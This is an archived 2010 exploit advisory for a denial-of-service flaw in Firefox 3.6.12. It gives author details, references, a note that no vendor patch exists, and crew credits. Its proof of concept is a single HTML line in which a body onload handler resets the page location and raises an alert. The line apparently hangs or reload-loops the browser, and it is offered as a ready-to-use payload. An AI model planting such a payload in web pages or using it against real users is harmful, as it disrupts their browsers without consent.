|    |    |    | Today: 21-Oct-2019 |

Firefox 3.6.12 Denial of Service Vulnerability

November 20, 2010 | Posted in ExploitAlert

-----------------------------------------------------------------------
Firefox 3.6.12 Denial of Service Vulnerability
-----------------------------------------------------------------------
Author : Don Tukulesto (root@indonesiancoder.com)
Site : http://indonesiancoder.com
Application : Firefox
Software : http://www.mozilla.org/
Version : 3.6.12
Time & Date : GMT +07:00 November 16, 2010

I. References
-----------------------------------------------------------------------
http://www.secuitylab.ir/
http://www.exploit-db.com/exploits/15498/
http://sebug.net/vulndb/20223/

II. POC
-----------------------------------------------------------------------

<body onload="location='';alert('Indonesian Coder Was Here');">

III. Vendor patch
-----------------------------------------------------------------------
Currently manufacturers do not provide patches or upgrades,
we recommend that users use the software vendor's home page at any time concerned to get the latest version:

http://www.mozilla.org/

IV. Credits
-----------------------------------------------------------------------
pouya.info, Indonesian Coder Team, KILL-9 Crew, MC-Crew, Jatimcom

Taged in: denial, Firefox, service, vulnerability